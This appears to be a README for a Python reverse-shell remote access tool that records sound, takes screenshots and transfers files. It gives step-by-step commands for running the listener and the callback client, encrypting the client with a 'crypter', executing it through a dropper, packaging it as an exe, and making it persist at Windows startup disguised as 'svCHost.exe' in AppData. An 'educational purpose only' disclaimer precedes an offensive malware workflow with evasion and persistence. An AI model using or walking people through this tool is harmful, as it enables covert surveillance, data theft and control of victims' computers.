
Reverse shell using socket programming in python

Primary LanguagePython


This is just for educational purpose only.This reverse shell should only be used in the lawful, remote administration of authorized systems. Accessing a computer network without authorization or permission is illegal.Do not attempt to violate the law with anything contained here.We will not be responsible for your any illegal actions.


Reverse shell using socket programming in python. With features like sound recording, screenshot,upload and download files.


  • python 3.7.x

How to Use

To use this reverse shell, two scripts need to be running

  • server/server.py - runs on server and waits for clients to connect.(listens on 4444 port)
  • client/client.py - connects to a remote server.


To set up server script, simply run server.py.
python server.py
You will get an interactive prompt.
To list all current connections:
shell> list
To select a target from the list of clients:
shell> select 0


In client.py , simply run or change the ip address of the server in the client.py file. python client.py

For obfuscation

$ cd crypter
$ python crypter.py ../client/client.py
which will create a encrypted payload using fernet encryption method.
$ type encrypted_payload.txt (copy this)
To execute encrypted payload use dropper.py.
change the value of data variable in dropper.py file with the encrypted_payload.txt content.
Than run:
$python dropper.py

Create Exe file.

To Create exe file of client.py run auto_py_to_exe command in terminal.

To run at startup (Windows os)

$copy Run_at_Startup/run_at_startup.py Run_at_Startup/copy.py
$copy Run_at_Startup/client_payload.py Run_at_Startup/svCHost.py
$cd crypter
$python crypter.py ../Run_at_Startup/copy.py
which will create a encrypted_payload.txt.(copy its content)
change the value of data variable in dropper/dropper.py file with the encrypted_payload.txt content.
$copy dropper.py copy.py
And than create its exe
$python crypter.py ../Run_at_Startup/svCHost.py
which will create a encrypted_payload.txt (copy its content).
change the value of data variable in dropper/dropper.py file with the encrypted_payload.txt content.
$copy dropper.py svCHost.py
And than create its exe.

To put both the exe at some location and just run copy.exe to it will copy the svCHost.exe in C:\Users<username>\AppData\Local\Microsoft or C:\Users<username>\AppData\Local\Microsoft\office and creates its shortcut in startup folder.

Pyaudio error

try this:
$pipwin install pyaudio
refer to this:https://stackoverflow.com/questions/52283840/i-cant-install-pyaudio-on-windows-how-to-solve-error-microsoft-visual-c-14